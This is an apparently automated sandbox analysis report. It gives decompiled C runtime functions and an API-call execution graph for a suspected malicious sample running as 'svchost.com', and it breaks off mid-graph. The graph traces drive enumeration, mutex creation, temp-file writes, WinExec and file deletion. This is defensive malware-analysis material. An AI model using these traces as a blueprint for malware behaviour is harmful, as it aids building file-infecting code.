                                                                          0x00df49f2
                                                                          0x00df49e7
                                                                          0x00000000
                                                                          0x00df4a0d
                                                                          0x00df49fa
                                                                          0x00df4a05
                                                                          0x00000000
                                                                          0x00df49b4
                                                                          0x00df49b7
                                                                          0x00df49bd
                                                                          0x00df49bd
                                                                          0x00df4a0e
                                                                          0x00df4a10
                                                                          0x00df49a1
                                                                          0x00df49ab
                                                                          0x00df49ab

                                                                          APIs
                                                                          • _free.LIBCMT ref: 00DF49B7
                                                                            • Part of subcall function 00DF4906: __FF_MSGBANNER.LIBCMT ref: 00DF491D
                                                                            • Part of subcall function 00DF4906: __NMSG_WRITE.LIBCMT ref: 00DF4924
                                                                            • Part of subcall function 00DF4906: RtlAllocateHeap.NTDLL(017C0000,00000000,00000001,00000000,00000000,00000000,?,00DF2E9E,00000000,00000000,00000000,00000000,?,00DF2D56,00000018,00DFD7D0), ref: 00DF4949
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free
                                                                          • String ID:
                                                                          • API String ID: 614378929-0
                                                                          • Opcode ID: 69befba40fd5a4cc269f76ed599bc0b0606acb67404266d2a3d0ff8b598c9655
                                                                          • Instruction ID: b292ce37ebf00598c8345d8d7632bd585dba6a3393913c69e219bdd8b3262401
                                                                          • Opcode Fuzzy Hash: 69befba40fd5a4cc269f76ed599bc0b0606acb67404266d2a3d0ff8b598c9655
                                                                          • Instruction Fuzzy Hash: 3811A332A4421EAECB212F74EC1567B3794EF04364B17C529FB489A251DF75C9808AB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF7A60, Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 20%
                                                                          			E00DF7A60(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E00DF8088(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E00DF75F7(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E00DF82E9(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E00DF7852(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E00DF75C7(_t25, _t29);
					return _t25;
				}
				return _t25;
			}











                                                                          0x00df7a60
                                                                          0x00df7a60
                                                                          0x00df7a63
                                                                          0x00df7a68
                                                                          0x00df7a6b
                                                                          0x00df7a6d
                                                                          0x00df7a70
                                                                          0x00df7a73
                                                                          0x00df7a74
                                                                          0x00df7a77
                                                                          0x00df7a7c
                                                                          0x00df7a7c
                                                                          0x00df7a7f
                                                                          0x00df7a83
                                                                          0x00df7a86
                                                                          0x00df7a8b
                                                                          0x00df7a88
                                                                          0x00df7a88
                                                                          0x00df7a88
                                                                          0x00df7a8e
                                                                          0x00df7a93
                                                                          0x00df7a94
                                                                          0x00df7a97
                                                                          0x00df7a99
                                                                          0x00df7a9c
                                                                          0x00df7a9f
                                                                          0x00df7aa0
                                                                          0x00df7aa8
                                                                          0x00df7aad
                                                                          0x00df7ab1
                                                                          0x00df7ab7
                                                                          0x00df7aba
                                                                          0x00df7abd
                                                                          0x00df7ac0
                                                                          0x00df7ac1
                                                                          0x00df7ac4
                                                                          0x00df7acf
                                                                          0x00df7ad3
                                                                          0x00000000
                                                                          0x00df7ad3
                                                                          0x00df7ada

                                                                          APIs
                                                                          • ___BuildCatchObject.LIBCMT ref: 00DF7A77
                                                                            • Part of subcall function 00DF8088: ___AdjustPointer.LIBCMT ref: 00DF80D1
                                                                          • _UnwindNestedFrames.LIBCMT ref: 00DF7A8E
                                                                          • ___FrameUnwindToState.LIBCMT ref: 00DF7AA0
                                                                          • CallCatchBlock.LIBCMT ref: 00DF7AC4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                          • String ID:
                                                                          • API String ID: 2633735394-0
                                                                          • Opcode ID: 5a2de6d7f914b26d8ecfc251db98e636c73078df35101615ef05083113ff3421
                                                                          • Instruction ID: 30a75142f4c0b0c940444d65bbf0914062f769d1e2c684874d778e80f8c6a48c
                                                                          • Opcode Fuzzy Hash: 5a2de6d7f914b26d8ecfc251db98e636c73078df35101615ef05083113ff3421
                                                                          • Instruction Fuzzy Hash: 1E01133200410DBBCF129FA5CC05EEE3BAAEF48754F168115FA1862120C732E9A1EBB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF35AC, Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 92%
                                                                          			E00DF35AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;

				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0xdfd810);
				E00DF2A00(__ebx, __edi, __esi);
				_t31 = E00DF17E3();
				_t25 =  *0xdffcf4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00DF2C8D(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xdff3b0; // 0x17dc460
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xdff6b0;
								if(__eflags != 0) {
									E00DF2E06(_t33);
								}
							}
						}
						_t20 =  *0xdff3b0; // 0x17dc460
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0xdff3b0; // 0x17dc460
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00DF3648();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E00DF19F8(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E00DF2A45(_t33);
			}









                                                                          0x00df35ac
                                                                          0x00df35ac
                                                                          0x00df35ac
                                                                          0x00df35ae
                                                                          0x00df35b3
                                                                          0x00df35bd
                                                                          0x00df35bf
                                                                          0x00df35c8
                                                                          0x00df35e9
                                                                          0x00df35ef
                                                                          0x00df35f3
                                                                          0x00df35f6
                                                                          0x00df35f9
                                                                          0x00df35ff
                                                                          0x00df3601
                                                                          0x00df3603
                                                                          0x00df360c
                                                                          0x00df360e
                                                                          0x00df3610
                                                                          0x00df3616
                                                                          0x00df3619
                                                                          0x00df361e
                                                                          0x00df3616
                                                                          0x00df360e
                                                                          0x00df361f
                                                                          0x00df3624
                                                                          0x00df3627
                                                                          0x00df362d
                                                                          0x00df3631
                                                                          0x00df3631
                                                                          0x00df3637
                                                                          0x00df363e
                                                                          0x00df35d0
                                                                          0x00df35d0
                                                                          0x00df35d0
                                                                          0x00df35d3
                                                                          0x00df35d5
                                                                          0x00df35d9
                                                                          0x00df35de
                                                                          0x00df35e6

                                                                          APIs
                                                                            • Part of subcall function 00DF17E3: __getptd_noexit.LIBCMT ref: 00DF17E4
                                                                          • __lock.LIBCMT ref: 00DF35E9
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00DF3606
                                                                          • _free.LIBCMT ref: 00DF3619
                                                                          • InterlockedIncrement.KERNEL32(017DC460), ref: 00DF3631
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                          • String ID:
                                                                          • API String ID: 2704283638-0
                                                                          • Opcode ID: 8a02c6ffab32323a6606b3097e9edbd18056756b63cdbbee7e2a34ff71feaedf
                                                                          • Instruction ID: ccab88107854517d8f795a656e5b07806b70c496eaeccb6236709eb58f5f9f96
                                                                          • Opcode Fuzzy Hash: 8a02c6ffab32323a6606b3097e9edbd18056756b63cdbbee7e2a34ff71feaedf
                                                                          • Instruction Fuzzy Hash: 0D015B32A01759ABCB21AB64980577DB760BF00B10F1BC115EB14E7395CB349A41CBF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF186A, Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 91%
                                                                          			E00DF186A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				short _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t41;
				void* _t42;

				_push(8);
				_push(0xdfd728);
				E00DF2A00(__ebx, __edi, __esi);
				_t41 =  *((intOrPtr*)(_t42 + 8));
				 *((intOrPtr*)(_t41 + 0x5c)) = 0xdf91c0;
				 *(_t41 + 8) =  *(_t41 + 8) & 0x00000000;
				 *((intOrPtr*)(_t41 + 0x14)) = 1;
				 *((intOrPtr*)(_t41 + 0x70)) = 1;
				_t23 = 0x43;
				 *((short*)(_t41 + 0xb8)) = _t23;
				 *((short*)(_t41 + 0x1be)) = _t23;
				 *(_t41 + 0x68) = 0xdff6b0;
				 *(_t41 + 0x3b8) =  *(_t41 + 0x3b8) & 0x00000000;
				E00DF2C8D(0xd);
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				InterlockedIncrement( *(_t41 + 0x68));
				 *(_t42 - 4) = 0xfffffffe;
				E00DF190B();
				E00DF2C8D(0xc);
				 *(_t42 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t42 + 0xc));
				 *((intOrPtr*)(_t41 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0xdff2ec; // 0xdff2f0
					 *((intOrPtr*)(_t41 + 0x6c)) = _t32;
				}
				E00DF2F1D( *((intOrPtr*)(_t41 + 0x6c)));
				 *(_t42 - 4) = 0xfffffffe;
				return E00DF2A45(E00DF1914());
			}








                                                                          0x00df186a
                                                                          0x00df186c
                                                                          0x00df1871
                                                                          0x00df1876
                                                                          0x00df1879
                                                                          0x00df1880
                                                                          0x00df1887
                                                                          0x00df188a
                                                                          0x00df188f
                                                                          0x00df1890
                                                                          0x00df1897
                                                                          0x00df189e
                                                                          0x00df18a5
                                                                          0x00df18ae
                                                                          0x00df18b4
                                                                          0x00df18bb
                                                                          0x00df18c1
                                                                          0x00df18c8
                                                                          0x00df18cf
                                                                          0x00df18d5
                                                                          0x00df18d8
                                                                          0x00df18db
                                                                          0x00df18e0
                                                                          0x00df18e2
                                                                          0x00df18e7
                                                                          0x00df18e7
                                                                          0x00df18ed
                                                                          0x00df18f3
                                                                          0x00df1904

                                                                          APIs
                                                                          • __lock.LIBCMT ref: 00DF18AE
                                                                            • Part of subcall function 00DF2C8D: __mtinitlocknum.LIBCMT ref: 00DF2C9F
                                                                            • Part of subcall function 00DF2C8D: EnterCriticalSection.KERNEL32(00000000,?,00DF18B3,0000000D), ref: 00DF2CB8
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 00DF18BB
                                                                          • __lock.LIBCMT ref: 00DF18CF
                                                                          • ___addlocaleref.LIBCMT ref: 00DF18ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                          • String ID:
                                                                          • API String ID: 1687444384-0
                                                                          • Opcode ID: fb886a6e2c569254b8ffeb025477a6c9f2a746890017df242776521816af68ca
                                                                          • Instruction ID: e03e605c7535ef9bd4782cc0d5e7e16f34d0ae83055f8bb40517b6adc59ecbec
                                                                          • Opcode Fuzzy Hash: fb886a6e2c569254b8ffeb025477a6c9f2a746890017df242776521816af68ca
                                                                          • Instruction Fuzzy Hash: 89013C75400709AED7209FA5C805769B7F0EF54321F21C90EE6AA963A1CB70A644CF74
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: svchost.com PID: 5568 Parent PID: 6792 svchost.comCOMMON

                                                                          Execution Graph

                                                                          Execution Coverage:10.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:883
                                                                          Total number of Limit Nodes:7

                                                                          Graph

                                                                          execution_graph 9492 4080e4 9521 403f14 GetModuleHandleA 9492->9521 9494 408102 9523 4070dc 9494->9523 9501 408197 9578 407e90 9501->9578 9504 40819c 9611 404ae8 9504->9611 9507 4081fb 9648 4079a0 9507->9648 9509 4049d0 27 API calls 9511 4081c3 9509->9511 9617 406fe4 9511->9617 9518 4049d0 27 API calls 9519 4081f3 9518->9519 9627 407d9c 9519->9627 9522 403f47 9521->9522 9522->9494 9524 4049d0 27 API calls 9523->9524 9525 4070f9 9524->9525 9691 404c78 9525->9691 9530 4049d0 9531 404a23 GetCommandLineA 9530->9531 9532 4049fb GetModuleFileNameA 9530->9532 9534 404a2a 9531->9534 9883 403184 9532->9883 9539 4031c4 25 API calls 9534->9539 9536 404ac1 9537 403094 11 API calls 9536->9537 9538 404ad9 9537->9538 9544 404f6c FindFirstFileA 9538->9544 9540 404a5c 9539->9540 9888 403464 9540->9888 9542 404a70 9542->9536 9543 403464 25 API calls 9542->9543 9543->9536 9545 404f87 9544->9545 9546 404f7c FindClose 9544->9546 9545->9501 9547 407678 9545->9547 9546->9545 9548 407680 9547->9548 9548->9548 9549 407687 9548->9549 9895 405008 GetTempPathA 9549->9895 9551 4076a1 9902 403214 9551->9902 9553 4076c9 9916 404de0 9553->9916 9556 405008 26 API calls 9557 4076df 9556->9557 9934 4032cc 9557->9934 9579 407e98 9578->9579 9579->9579 10004 404f90 GetWindowsDirectoryA 9579->10004 9581 407eb6 9582 403214 25 API calls 9581->9582 9583 407ed5 9582->9583 10011 404b9c 9583->10011 9586 408005 9590 4030b8 11 API calls 9586->9590 9587 407ee5 10015 405c80 9587->10015 9592 40801f 9590->9592 9591 404f90 26 API calls 9593 407f03 9591->9593 9592->9504 9594 403214 25 API calls 9593->9594 9595 407f22 9594->9595 10018 405e04 9595->10018 9597 407fb6 9598 404f90 26 API calls 9597->9598 9601 407fbe 9598->9601 9599 404b9c GetFileAttributesA 9603 407f2d 9599->9603 9604 403214 25 API calls 9601->9604 9603->9599 9608 407f5f 9603->9608 10032 405cec 9603->10032 9605 407fdd 9604->9605 10100 405e50 9605->10100 9608->9597 9609 405cec 11 API calls 9608->9609 10036 4071d0 9608->10036 10088 407130 9608->10088 9609->9608 9610 407fe8 9610->9504 9612 404afe 9611->9612 9613 4049d0 27 API calls 9612->9613 9614 404b12 9612->9614 9613->9612 9615 403094 11 API calls 9614->9615 9616 404b27 9615->9616 9616->9507 9616->9509 9618 406ffd 9617->9618 10378 404f18 9618->10378 9622 407029 10387 403258 9622->10387 9624 40703d 9625 4030b8 11 API calls 9624->9625 9626 407063 9625->9626 9626->9507 9626->9518 9628 407db4 9627->9628 9629 407dd4 9628->9629 9630 407dca 9628->9630 10402 407bd4 9629->10402 9631 4071d0 108 API calls 9630->9631 9633 407dd2 9631->9633 9634 404ae8 27 API calls 9633->9634 9642 407de1 9634->9642 9635 407e28 10421 406f34 9635->10421 9638 4032cc 25 API calls 9639 407e4c 9638->9639 9641 407e54 WinExec 9639->9641 9640 4049d0 27 API calls 9640->9642 9643 407e67 9641->9643 9642->9635 9642->9640 9644 4071d0 108 API calls 9642->9644 9645 407bd4 36 API calls 9642->9645 9646 4030b8 11 API calls 9643->9646 9644->9642 9645->9642 9647 407e74 9646->9647 9647->9507 9649 4079ce 9648->9649 9650 404f90 26 API calls 9649->9650 9651 4079ec 9650->9651 9652 403258 25 API calls 9651->9652 9653 4079f8 9652->9653 9654 404b9c GetFileAttributesA 9653->9654 9655 407a00 9654->9655 9656 407a12 9655->9656 9657 407a0c DeleteFileA 9655->9657 10467 404bf8 9656->10467 9657->9656 9659 407aa9 9660 4030b8 11 API calls 9659->9660 9662 407ac3 9660->9662 9661 407a29 9661->9659 10478 40575c 9661->10478 9670 40759c 9662->9670 9664 407a60 9665 403258 25 API calls 9664->9665 9666 407a96 9665->9666 10482 40578c 9666->10482 10490 406e94 9670->10490 9672 407641 9674 4030b8 11 API calls 9672->9674 9673 4075b9 9673->9672 10503 404018 CreateMutexA 9673->10503 9675 40765b 9674->9675 9687 4030b8 9675->9687 9677 4075e3 GetLastError 9677->9672 9678 4075f1 9677->9678 10504 406d40 GetLogicalDriveStringsA 9678->10504 9680 407636 10523 406e0c 9680->10523 9682 4031b4 25 API calls 9684 4075f9 9682->9684 9684->9680 9684->9682 9685 403214 25 API calls 9684->9685 10512 4074b4 9684->10512 9685->9684 9689 4030be 9687->9689 9688 4030e4 9689->9688 9690 402468 11 API calls 9689->9690 9690->9689 9706 4031c4 9691->9706 9695 404cb4 9696 404cd0 9695->9696 9715 404bc4 ReadFile 9695->9715 9699 403094 11 API calls 9696->9699 9701 404ce5 9699->9701 9702 403094 9701->9702 9703 40309a 9702->9703 9705 4030b5 9702->9705 9703->9705 9879 402468 9703->9879 9705->9530 9710 403184 9706->9710 9708 403194 9709 403094 11 API calls 9708->9709 9711 4031ac 9709->9711 9718 403158 9710->9718 9712 404b68 9711->9712 9713 404b77 9712->9713 9714 404b79 CreateFileA 9712->9714 9713->9714 9714->9695 9716 404bd9 9715->9716 9717 404b90 CloseHandle 9716->9717 9717->9696 9719 403180 9718->9719 9720 40315c 9718->9720 9719->9708 9723 402448 9720->9723 9724 402460 9723->9724 9725 40244d 9723->9725 9724->9708 9729 401e74 9725->9729 9726 402453 9726->9724 9740 402530 9726->9740 9730 401e88 9729->9730 9733 401e8d 9729->9733 9746 401788 RtlInitializeCriticalSection 9730->9746 9732 401eba RtlEnterCriticalSection 9734 401ec4 9732->9734 9733->9732 9733->9734 9739 401e99 9733->9739 9734->9739 9753 401d80 9734->9753 9737 401fe5 RtlLeaveCriticalSection 9738 401fef 9737->9738 9738->9726 9739->9726 9741 4024e4 9740->9741 9742 402509 9741->9742 9845 403ec8 9741->9845 9853 4024d8 9742->9853 9747 4017ac RtlEnterCriticalSection 9746->9747 9748 4017b6 9746->9748 9747->9748 9749 4017d4 LocalAlloc 9748->9749 9750 4017ee 9749->9750 9751 401833 RtlLeaveCriticalSection 9750->9751 9752 40183d 9750->9752 9751->9752 9752->9733 9756 401d90 9753->9756 9754 401dbc 9758 401de0 9754->9758 9764 401b94 9754->9764 9756->9754 9756->9758 9759 401cf4 9756->9759 9758->9737 9758->9738 9768 401548 9759->9768 9761 401d04 9763 401d11 9761->9763 9777 401c68 9761->9777 9763->9756 9765 401bb2 9764->9765 9766 401be9 9764->9766 9765->9758 9766->9765 9813 401ae4 9766->9813 9772 401564 9768->9772 9769 40156e 9784 401434 9769->9784 9772->9769 9774 4015bf 9772->9774 9775 40157a 9772->9775 9788 4012a0 9772->9788 9796 40119c 9772->9796 9800 40137c 9774->9800 9775->9761 9804 401c1c 9777->9804 9780 40119c LocalAlloc 9782 401c8c 9780->9782 9781 401c94 9781->9763 9782->9781 9808 4019c0 9782->9808 9785 40147a 9784->9785 9786 401496 VirtualAlloc 9785->9786 9787 4014aa 9785->9787 9786->9785 9786->9787 9787->9775 9789 4012af VirtualAlloc 9788->9789 9791 4012dc 9789->9791 9792 4012ff 9789->9792 9793 401154 LocalAlloc 9791->9793 9792->9772 9794 4012e8 9793->9794 9794->9792 9795 4012ec VirtualFree 9794->9795 9795->9792 9797 4011b8 9796->9797 9798 401154 LocalAlloc 9797->9798 9799 4011fe 9798->9799 9799->9772 9803 4013ab 9800->9803 9801 401404 9801->9775 9802 4013d8 VirtualFree 9802->9803 9803->9801 9803->9802 9805 401c2e 9804->9805 9806 401c25 9804->9806 9805->9780 9806->9805 9807 4019f0 9 API calls 9806->9807 9807->9805 9809 4019dd 9808->9809 9810 4019ce 9808->9810 9809->9781 9811 401b94 9 API calls 9810->9811 9812 4019db 9811->9812 9812->9781 9815 401afa 9813->9815 9814 401b82 9814->9765 9815->9814 9816 401b25 9815->9816 9817 401b39 9815->9817 9826 4016fc 9816->9826 9819 4016fc 3 API calls 9817->9819 9820 401b37 9819->9820 9820->9814 9821 4019c0 9 API calls 9820->9821 9822 401b5d 9821->9822 9823 401b77 9822->9823 9836 401a14 9822->9836 9841 40120c 9823->9841 9827 401722 9826->9827 9835 40177b 9826->9835 9828 4014c8 VirtualFree 9827->9828 9829 40172f 9828->9829 9830 40119c LocalAlloc 9829->9830 9832 40173f 9830->9832 9831 401756 9834 40120c LocalAlloc 9831->9834 9831->9835 9832->9831 9833 40137c VirtualFree 9832->9833 9833->9831 9834->9835 9835->9820 9837 401a27 9836->9837 9838 401a19 9836->9838 9837->9823 9839 4019f0 9 API calls 9838->9839 9840 401a26 9839->9840 9840->9823 9842 401217 9841->9842 9843 401232 9842->9843 9844 401154 LocalAlloc 9842->9844 9843->9814 9844->9843 9846 403ed7 9845->9846 9847 403efd TlsGetValue 9845->9847 9846->9742 9848 403ee2 9847->9848 9849 403f07 9847->9849 9856 403e84 9848->9856 9849->9742 9851 403ee7 TlsGetValue 9852 403ef6 9851->9852 9852->9742 9863 40307c 9853->9863 9857 403e8a 9856->9857 9861 403eae 9857->9861 9862 403e70 LocalAlloc 9857->9862 9859 403eaa 9860 403eba TlsSetValue 9859->9860 9859->9861 9860->9861 9861->9851 9862->9859 9866 402fa4 9863->9866 9867 402fbd 9866->9867 9869 402fe6 9867->9869 9873 402f18 9867->9873 9870 403028 FreeLibrary 9869->9870 9871 40304c ExitProcess 9869->9871 9870->9869 9874 402f22 GetStdHandle WriteFile GetStdHandle WriteFile 9873->9874 9875 402f79 9873->9875 9874->9869 9877 402f82 MessageBoxA 9875->9877 9878 402f95 9875->9878 9877->9878 9878->9869 9880 402480 9879->9880 9881 40246d 9879->9881 9880->9705 9881->9880 9882 402530 11 API calls 9881->9882 9882->9880 9884 403158 25 API calls 9883->9884 9885 403194 9884->9885 9886 403094 11 API calls 9885->9886 9887 4031ac 9886->9887 9887->9536 9889 403496 9888->9889 9890 403469 9888->9890 9891 403094 11 API calls 9889->9891 9890->9889 9892 40347d 9890->9892 9894 40348c 9891->9894 9893 403184 25 API calls 9892->9893 9893->9894 9894->9542 9896 4031c4 25 API calls 9895->9896 9897 40504c 9896->9897 9943 404db8 9897->9943 9900 403094 11 API calls 9901 405071 9900->9901 9901->9551 9903 403257 9902->9903 9904 403218 9902->9904 9903->9553 9905 403222 9904->9905 9906 4030e8 9904->9906 9907 403235 9905->9907 9908 40324c 9905->9908 9912 403158 25 API calls 9906->9912 9913 4030fc 9906->9913 9964 403534 9907->9964 9910 403534 25 API calls 9908->9910 9915 40323a 9910->9915 9911 40312a 9911->9553 9912->9913 9913->9911 9914 402468 11 API calls 9913->9914 9914->9911 9915->9553 9917 404df5 9916->9917 9932 404e7a 9917->9932 9970 404dcc 9917->9970 9919 4030b8 11 API calls 9921 404e9e 9919->9921 9921->9556 9923 404e2a 9923->9932 9977 404cf8 GetFileAttributesA 9923->9977 9927 404e4e 9928 404eec 25 API calls 9927->9928 9927->9932 9929 404e66 9928->9929 9930 404de0 27 API calls 9929->9930 9931 404e6e 9930->9931 9931->9932 9983 404eb0 9931->9983 9932->9919 9935 4032dd 9934->9935 9936 403303 9935->9936 9937 40331a 9935->9937 9938 403534 25 API calls 9936->9938 9939 403158 25 API calls 9937->9939 9941 403310 9938->9941 9939->9941 9940 40334b 9941->9940 9942 4030e8 25 API calls 9941->9942 9942->9940 9946 404d48 9943->9946 9955 4030e8 9946->9955 9948 404d6d 9951 404d95 9948->9951 9961 4031b4 9948->9961 9953 403094 11 API calls 9951->9953 9952 403214 25 API calls 9952->9951 9954 404daa 9953->9954 9954->9900 9956 4030ec 9955->9956 9957 4030fc 9955->9957 9956->9957 9959 403158 25 API calls 9956->9959 9958 40312a 9957->9958 9960 402468 11 API calls 9957->9960 9958->9948 9959->9957 9960->9958 9962 403184 25 API calls 9961->9962 9963 4031c1 9962->9963 9963->9952 9965 403541 9964->9965 9969 403571 9964->9969 9967 403158 25 API calls 9965->9967 9968 40354d 9965->9968 9966 403094 11 API calls 9966->9968 9967->9969 9968->9915 9969->9966 9986 404d08 9970->9986 9973 40312c 9975 403130 9973->9975 9974 403154 9974->9923 9975->9974 9976 402468 11 API calls 9975->9976 9976->9974 9978 404d01 9977->9978 9978->9932 9979 404eec 9978->9979 9980 404ef8 9979->9980 9981 403184 25 API calls 9980->9981 9982 404f11 9981->9982 9982->9927 10002 40340c 9983->10002 9987 4030e8 25 API calls 9986->9987 9989 404d1a 9987->9989 9988 404d43 9988->9973 9989->9988 9991 4034a4 9989->9991 9996 40345c 9991->9996 9993 4034e8 9993->9988 9994 4034b2 9994->9993 9995 403534 25 API calls 9994->9995 9995->9993 9997 403418 9996->9997 9998 403453 9997->9998 9999 403158 25 API calls 9997->9999 9998->9994 10000 40342f 9999->10000 10000->9998 10001 402468 11 API calls 10000->10001 10001->9998 10003 403410 CreateDirectoryA 10002->10003 10003->9932 10005 4031c4 25 API calls 10004->10005 10006 404fd4 10005->10006 10007 404db8 25 API calls 10006->10007 10008 404fe1 10007->10008 10009 403094 11 API calls 10008->10009 10010 404ff9 10009->10010 10010->9581 10111 404490 10011->10111 10014 404baa 10014->9586 10014->9587 10113 4044f8 10015->10113 10019 404b68 CreateFileA 10018->10019 10020 405e10 10019->10020 10021 405e13 GetFileSize 10020->10021 10031 405e4a 10020->10031 10022 403184 25 API calls 10021->10022 10023 405e2a 10022->10023 10024 404bc4 ReadFile 10023->10024 10025 405e34 10024->10025 10122 404b90 CloseHandle 10025->10122 10027 405e3a 10123 405e94 10027->10123 10029 405e45 10133 4044a8 10029->10133 10031->9603 10033 405cfe 